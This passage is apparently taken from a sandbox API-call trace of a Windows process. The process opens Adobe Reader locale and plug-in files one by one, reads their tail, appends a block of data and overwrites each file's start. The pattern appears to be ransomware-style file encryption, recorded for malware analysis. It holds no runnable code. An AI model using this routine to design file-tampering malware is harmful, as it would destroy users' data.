(in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0089.129] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8400 [0089.129] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.129] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8400 [0089.130] WriteFile (in: hFile=0x1cc, lpBuffer=0x2664368*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0089.130] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0089.130] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0089.130] CloseHandle (hObject=0x1cc) returned 1 [0089.130] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Search.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\search.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0089.131] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0089.131] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3a00 [0089.131] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0089.131] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0089.131] ReleaseMutex (hMutex=0x168) returned 1 [0089.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.CHS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0089.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.CHS", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.CHS", lpUsedDefaultChar=0x0) returned 10 [0089.131] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.144] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2a00 [0089.144] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.205] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2a00 [0089.205] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0089.205] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0089.205] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0089.205] CloseHandle (hObject=0x1cc) returned 1 [0089.205] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Acroform.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\acroform.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0089.206] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0089.206] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3ce00 [0089.206] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0089.206] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0089.206] ReleaseMutex (hMutex=0x168) returned 1 [0089.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.CHT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.CHT", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.CHT", lpUsedDefaultChar=0x0) returned 12 [0089.207] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0090.011] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3be00 [0090.011] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.580] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3be00 [0090.581] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.581] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0090.581] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0090.581] CloseHandle (hObject=0x1cc) returned 1 [0090.582] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\EScript.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\escript.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0090.582] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0090.582] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x7400 [0090.582] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0090.582] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.582] ReleaseMutex (hMutex=0x168) returned 1 [0090.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.CHT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0090.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.CHT", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.CHT", lpUsedDefaultChar=0x0) returned 11 [0090.583] ReadFile (in: hFile=0x1cc, lpBuffer=0x2865a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.694] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6400 [0090.694] ReadFile (in: hFile=0x1cc, lpBuffer=0x2865a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.781] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6400 [0090.781] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.781] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0090.781] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.781] CloseHandle (hObject=0x1cc) returned 1 [0090.791] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\reflow.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\reflow.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0090.791] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0090.792] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1000 [0090.792] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0090.792] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.792] ReleaseMutex (hMutex=0x168) returned 1 [0090.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.CHT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0090.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.CHT", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.CHT", lpUsedDefaultChar=0x0) returned 10 [0090.792] ReadFile (in: hFile=0x1cc, lpBuffer=0x2667c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesRead=0x331f2bc*=0x1000, lpOverlapped=0x0) returned 1 [0090.878] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0090.878] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x331f2d0*=0x1588, lpOverlapped=0x0) returned 1 [0090.878] CloseHandle (hObject=0x1cc) returned 1 [0090.878] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Weblink.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\weblink.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0090.879] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0090.879] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4e00 [0090.879] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0090.879] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.879] ReleaseMutex (hMutex=0x168) returned 1 [0090.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.CHT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0090.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.CHT", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.CHT", lpUsedDefaultChar=0x0) returned 11 [0090.879] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.880] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3e00 [0090.880] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.881] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3e00 [0090.881] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.882] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0090.882] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.882] CloseHandle (hObject=0x1cc) returned 1 [0090.882] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acrosign.prc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0090.883] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0090.883] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x217e [0090.883] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0090.883] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.883] ReleaseMutex (hMutex=0x168) returned 1 [0090.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroSign.prc", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroSign.prc", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AcroSign.prc", lpUsedDefaultChar=0x0) returned 12 [0090.883] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.260] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x117e [0092.260] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.262] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x117e [0092.262] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.262] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0092.262] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.262] CloseHandle (hObject=0x1cc) returned 1 [0092.263] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\makeaccessible.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0092.266] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0092.266] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x234a63 [0092.266] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0092.266] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.266] ReleaseMutex (hMutex=0x168) returned 1 [0092.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.api", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.api", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MakeAccessible.api", lpUsedDefaultChar=0x0) returned 18 [0092.266] ReadFile (in: hFile=0x1cc, lpBuffer=0x2897978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.363] ReadFile (in: hFile=0x1cc, lpBuffer=0x2897978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0092.364] ReadFile (in: hFile=0x1cc, lpBuffer=0x2897978, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0092.365] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x232a63 [0092.365] ReadFile (in: hFile=0x1cc, lpBuffer=0x2865a58, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0092.419] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x232a63 [0092.420] WriteFile (in: hFile=0x1cc, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x331f28c*=0x2588, lpOverlapped=0x0) returned 1 [0092.421] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0092.421] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.421] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0092.422] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x2000, lpOverlapped=0x0) returned 1 [0092.422] CloseHandle (hObject=0x1cc) returned 1 [0092.422] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0092.423] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0092.423] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0092.423] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, 